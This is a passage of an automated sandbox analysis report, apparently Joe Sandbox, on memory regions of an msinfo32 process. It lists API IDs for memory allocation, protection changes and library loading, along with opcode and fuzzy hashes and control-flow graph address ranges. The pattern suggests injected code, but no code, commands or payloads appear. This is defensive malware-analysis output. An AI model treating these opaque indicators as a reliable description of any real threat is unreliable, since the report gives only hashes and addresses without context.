                • Source File: 0000000B.00000002.1976117321.0000027ADED60000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000027ADED60000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_11_2_27aded60000_msinfo32.jbxd
                Yara matches
                Similarity
                • API ID: AllocVirtual
                • String ID:
                • API String ID: 4275171209-0
                • Opcode ID: 08c3b473a1f7362871bcf2729fe2c144e163769adb635b581bed10db9dac86c4
                • Instruction ID: 8fd0359ebf06b94a50b5bbe5207aae6c9cc1f7bf65adf6e90c34035b970a92c3
                • Opcode Fuzzy Hash: 08c3b473a1f7362871bcf2729fe2c144e163769adb635b581bed10db9dac86c4
                • Instruction Fuzzy Hash: 48C1773071D9054BEB79FB28C4A97ADB3D1FBD4314F5842A9D88FC7585DF20E9428682

                Control-flow Graph

                APIs
                Memory Dump Source
                • Source File: 0000000B.00000002.1976117321.0000027ADED60000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000027ADED60000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_11_2_27aded60000_msinfo32.jbxd
                Yara matches
                Similarity
                • API ID: ProtectVirtual$LibraryLoad
                • String ID:
                • API String ID: 895956442-0
                • Opcode ID: d24d4ce7223a552c1b01d238479d20a295a89e3d53a7350efd5ba8d12bfb46a0
                • Instruction ID: afa7d3cbe098c9efaca8f11ddb85e37d16e8f7b5e8a815b39afb7854a43c40d8
                • Opcode Fuzzy Hash: d24d4ce7223a552c1b01d238479d20a295a89e3d53a7350efd5ba8d12bfb46a0
                • Instruction Fuzzy Hash: 6831543171CA184BD769BF28986976E73D5E7C8730F1406AAAC8FC32CADD60DD0646C2

                Control-flow Graph

                APIs
                Memory Dump Source
                • Source File: 0000000B.00000002.1976117321.0000027ADED60000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000027ADED60000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_11_2_27aded60000_msinfo32.jbxd
                Yara matches
                Similarity
                • API ID: ProtectVirtual
                • String ID:
                • API String ID: 544645111-0
                • Opcode ID: f2b484dd179f3dd10506a7a62fe75bc60ed010a6cf5ae84582fe1852291c4020
                • Instruction ID: a8ca567330a4fe95828815813703903aec7eda558ebb74596c30f5166a05c6d1
                • Opcode Fuzzy Hash: f2b484dd179f3dd10506a7a62fe75bc60ed010a6cf5ae84582fe1852291c4020
                • Instruction Fuzzy Hash: 9221333170CA184BDB68BB5CA86936D73D1E7C8720F1401AAED8FC36CADD64DD064682

                Control-flow Graph

                APIs
                Memory Dump Source
                • Source File: 0000000B.00000002.1976117321.0000027ADED60000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000027ADED60000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_11_2_27aded60000_msinfo32.jbxd
                Yara matches
                Similarity
                • API ID: AllocArrayCreateDestroyInstanceSafeString
                • String ID:
                • API String ID: 815377780-0
                • Opcode ID: dae33ee218254d575b2f885f916d6963ffe40f3360d10ef8a927e24c671039fc
                • Instruction ID: 7b5188e5aff4a33fa02ede3d11fffb7e37726453ba621d33a355de6f5d6b929b
                • Opcode Fuzzy Hash: dae33ee218254d575b2f885f916d6963ffe40f3360d10ef8a927e24c671039fc
                • Instruction Fuzzy Hash: 84815F3021DA488FD768EF28D8997AAB7E0FF99311F04466D949FC7591DF30E9058B82

                Control-flow Graph

                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000B.00000002.1976117321.0000027ADED60000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000027ADED60000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_11_2_27aded60000_msinfo32.jbxd
                Yara matches
                Similarity
                • API ID: LibraryLoad
                • String ID: l
                • API String ID: 1029625771-2517025534
                • Opcode ID: 1385f4a438fc17bb376d03bd0145f1e19b120c532c3e81762a8c516170bfbca4
                • Instruction ID: d8aeb46fc5f03a1e5f90befaf888dd7120a0e8f5f18a129bba0b47de933a5fc0
                • Opcode Fuzzy Hash: 1385f4a438fc17bb376d03bd0145f1e19b120c532c3e81762a8c516170bfbca4
                • Instruction Fuzzy Hash: 5A31A37061DAC54FE765EB28C058726BBD5FBA9318F2856ECC0CFC7556DB20D8468702

                Control-flow Graph

                APIs
                Memory Dump Source
                • Source File: 0000000B.00000002.1976117321.0000027ADED60000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000027ADED60000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_11_2_27aded60000_msinfo32.jbxd
                Yara matches
                Similarity
                • API ID: ProtectVirtual$LibraryLoad
                • String ID:
                • API String ID: 895956442-0
                • Opcode ID: b17c4479f7010fd41cbad95f9fb04bd4be79ef02ed8fc175b75ead6b9ebb131e
                • Instruction ID: c865a29635b01afabf0b196beee028d46f9345e7ffbc22b599acfc634ee96427
                • Opcode Fuzzy Hash: b17c4479f7010fd41cbad95f9fb04bd4be79ef02ed8fc175b75ead6b9ebb131e
                • Instruction Fuzzy Hash: E011883171CA084BDBA5FB18989976E77E5FBD8310F4405BAAC8FC7689DE20DD418782

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 204 7ffd9b8c0e15-7ffd9b8c11f4 206 7ffd9b8c11f8-7ffd9b8c1203 204->206 207 7ffd9b8c11f6 204->207 208 7ffd9b8c120a-7ffd9b8c1210 206->208 207->206 209 7ffd9b8c1214-7ffd9b8c1228 208->209 210 7ffd9b8c1212 208->210 210->209
                Memory Dump Source
                • Source File: 0000000B.00000002.1976793205.00007FFD9B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_11_2_7ffd9b8c0000_msinfo32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: fb99682fa1fe3cbe67577c69c7d731d47e184d1ea1d8370dfbc98cab651500fd
                • Instruction ID: 7650eb2442a5a36c7214ee99a3f98501be2af66accf195691212864de3a8e85a
                • Opcode Fuzzy Hash: fb99682fa1fe3cbe67577c69c7d731d47e184d1ea1d8370dfbc98cab651500fd
                • Instruction Fuzzy Hash: 34012655B0D6890FE74AAB7858759B87F909F9A740F0A00F7F88CCB2F7DC189A418361

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 272 7ffd9b8c055d-7ffd9b8c058b 274 7ffd9b8c0790-7ffd9b8c07d0 272->274 275 7ffd9b8c0591-7ffd9b8c059d 272->275 278 7ffd9b8c059f 275->278 279 7ffd9b8c05a1-7ffd9b8c05b8 call 7ffd9b8c0120 275->279 278->279 286 7ffd9b8c05bc-7ffd9b8c05ca 279->286 287 7ffd9b8c05ba 279->287 289 7ffd9b8c05cc 286->289 290 7ffd9b8c05ce-7ffd9b8c05e5 call 7ffd9b8c0120 286->290 287->286 289->290 294 7ffd9b8c05e7 290->294 295 7ffd9b8c05e9-7ffd9b8c05f7 290->295 294->295 297 7ffd9b8c05fb-7ffd9b8c0612 call 7ffd9b8c0120 295->297 298 7ffd9b8c05f9 295->298 302 7ffd9b8c0616-7ffd9b8c0624 297->302 303 7ffd9b8c0614 297->303 298->297 305 7ffd9b8c0628-7ffd9b8c063f call 7ffd9b8c0120 302->305 306 7ffd9b8c0626 302->306 303->302 310 7ffd9b8c0643-7ffd9b8c0651 305->310 311 7ffd9b8c0641 305->311 306->305 313 7ffd9b8c0655-7ffd9b8c066c call 7ffd9b8c0120 310->313 314 7ffd9b8c0653 310->314 311->310 318 7ffd9b8c0670-7ffd9b8c067e 313->318 319 7ffd9b8c066e 313->319 314->313 321 7ffd9b8c0680 318->321 322 7ffd9b8c0682-7ffd9b8c0699 call 7ffd9b8c0120 318->322 319->318 321->322 326 7ffd9b8c069b 322->326 327 7ffd9b8c069d-7ffd9b8c06ad call 7ffd9b8c0250 322->327 326->327 331 7ffd9b8c06b6-7ffd9b8c06df call 7ffd9b8c01f0 327->331 332 7ffd9b8c06af 327->332 337 7ffd9b8c06e3-7ffd9b8c0736 331->337 338 7ffd9b8c06e1 331->338 332->331 344 7ffd9b8c0738 337->344 345 7ffd9b8c073a-7ffd9b8c078f 337->345 338->337 344->345
                Memory Dump Source
                • Source File: 0000000B.00000002.1976793205.00007FFD9B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_11_2_7ffd9b8c0000_msinfo32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: f4842f653b953f64a6274013a082c926e57d66b7df5fe709193ed5a5239daf4e
                • Instruction ID: db49c811b3cab923e500a7f05c9119c13e8b0d81a501da46652b7f697d15c98e
                • Opcode Fuzzy Hash: f4842f653b953f64a6274013a082c926e57d66b7df5fe709193ed5a5239daf4e
                • Instruction Fuzzy Hash: 1981E861F1EA8E0FE7A9BBB844399B87AA1DF9D780B1504FBD04DC72E7DD1869058301

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 352 7ffd9b8c0949-7ffd9b8c0955 353 7ffd9b8c0957 352->353 354 7ffd9b8c0959-7ffd9b8c0998 352->354 353->354 355 7ffd9b8c0999-7ffd9b8c09b1 353->355 354->355 359 7ffd9b8c09b5-7ffd9b8c09c4 355->359 360 7ffd9b8c09b3 355->360 362 7ffd9b8c09c8-7ffd9b8c09eb call 7ffd9b8c0210 359->362 363 7ffd9b8c09c6 359->363 360->359 367 7ffd9b8c09ef-7ffd9b8c0a02 call 7ffd9b8c03e8 362->367 368 7ffd9b8c09ed 362->368 363->362 372 7ffd9b8c0a07-7ffd9b8c0a17 call 7ffd9b8c03f8 367->372 368->367 375 7ffd9b8c0a1b-7ffd9b8c0a29 372->375 376 7ffd9b8c0a19 372->376 378 7ffd9b8c0a2b 375->378 379 7ffd9b8c0a2d-7ffd9b8c0a3c 375->379 376->375 378->379 380 7ffd9b8c0a40-7ffd9b8c0a6d 379->380 381 7ffd9b8c0a3e 379->381 385 7ffd9b8c0a6f 380->385 386 7ffd9b8c0a71-7ffd9b8c0a85 380->386 381->380 385->386 388 7ffd9b8c0a87 386->388 389 7ffd9b8c0a89-7ffd9b8c0aa0 386->389 388->389 391 7ffd9b8c0aa4-7ffd9b8c0abb 389->391 392 7ffd9b8c0aa2 389->392 394 7ffd9b8c0abf-7ffd9b8c0acf 391->394 395 7ffd9b8c0abd 391->395 392->391 395->394
                Memory Dump Source
                • Source File: 0000000B.00000002.1976793205.00007FFD9B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_11_2_7ffd9b8c0000_msinfo32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: a6c3748f3207f8068d292aa8aaa84f81a77e190d345ff82862a985bfed9aa5b8
                • Instruction ID: e342605e04c501cccce6242ebd0ce01525eec1c7e156ea072e6a820984c8116b
                • Opcode Fuzzy Hash: a6c3748f3207f8068d292aa8aaa84f81a77e190d345ff82862a985bfed9aa5b8
                • Instruction Fuzzy Hash: 1051C6B0F19A8E4FE759EBA88475AB87BB1EF9E740F1501BAD04CC72E7CD2469008711

                Control-flow Graph

                Memory Dump Source
                • Source File: 0000000B.00000002.1976793205.00007FFD9B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_11_2_7ffd9b8c0000_msinfo32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 1716232c2a36855a8a30c5d2189fefa65e6217c33d6a362f029aa8831ba43c52
                • Instruction ID: 52d5a82c4461b7ca14bb095231af6cb51ed164affd6ffba65461ac11b35febc6
                • Opcode Fuzzy Hash: 1716232c2a36855a8a30c5d2189fefa65e6217c33d6a362f029aa8831ba43c52
                • Instruction Fuzzy Hash: 90310561F189490FEB84BBAC58697BC77E2EF9C715F0502B7E01DC32D6DE2868018392

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 421 7ffd9b8c0849-7ffd9b8c086e 425 7ffd9b8c0870 421->425 426 7ffd9b8c0872-7ffd9b8c0918 421->426 425->426 437 7ffd9b8c0921-7ffd9b8c0944 426->437
                Memory Dump Source
                • Source File: 0000000B.00000002.1976793205.00007FFD9B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_11_2_7ffd9b8c0000_msinfo32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: f532b054384532631f8465e6493bbcd344fd53107ed06fdd0c361c5c254ed8d8
                • Instruction ID: 0750eaa390d2147015d8ced443a99b25b893db079a77ca04f6d6b71f8d1d3a55
                • Opcode Fuzzy Hash: f532b054384532631f8465e6493bbcd344fd53107ed06fdd0c361c5c254ed8d8
                • Instruction Fuzzy Hash: 02317E20B1C9494FEB88EF6C846A778B2C2EF9D301F0545BEA04EC72E7DE289C418741

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 440 7ffd9b8c07d6-7ffd9b8c0824 442 7ffd9b8c0826-7ffd9b8c0830 440->442 443 7ffd9b8c0837-7ffd9b8c0840 442->443 445 7ffd9b8c0842 443->445 445->445
                Memory Dump Source
                • Source File: 0000000B.00000002.1976793205.00007FFD9B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_11_2_7ffd9b8c0000_msinfo32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: a4244e99c4bb3ff34c9bda687186cb2bcdcb3ccf264dca8ab82b24a6881da471
                • Instruction ID: 62694c23fb2af2844bc25d28451d78c183eacbddb78f407215999349ce5b10eb
                • Opcode Fuzzy Hash: a4244e99c4bb3ff34c9bda687186cb2bcdcb3ccf264dca8ab82b24a6881da471
                • Instruction Fuzzy Hash: FF01F94250F6C21FD79756B84CA95A23FE9CE9756470E00F7E588CA163D84D1807C3A2

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 446 7ffd9b8c0120-7ffd9b8c0830 449 7ffd9b8c0837-7ffd9b8c0840 446->449 451 7ffd9b8c0842 449->451 451->451
                Memory Dump Source
                • Source File: 0000000B.00000002.1976793205.00007FFD9B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_11_2_7ffd9b8c0000_msinfo32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 462b14af29d0ceb35d14b6ab462d2639804089b3ead96f2e03c5507bbeda40d2
                • Instruction ID: 7a48f5f5e0f6e8b54e514c146ce589c7e1a3872da8045b9c3e8705f7f9913737
                • Opcode Fuzzy Hash: 462b14af29d0ceb35d14b6ab462d2639804089b3ead96f2e03c5507bbeda40d2
                • Instruction Fuzzy Hash: AFE0DF93A2A8191AE2B8659D0CA98720B9DDFE99D972A0477B15EC22A2EC44280245C1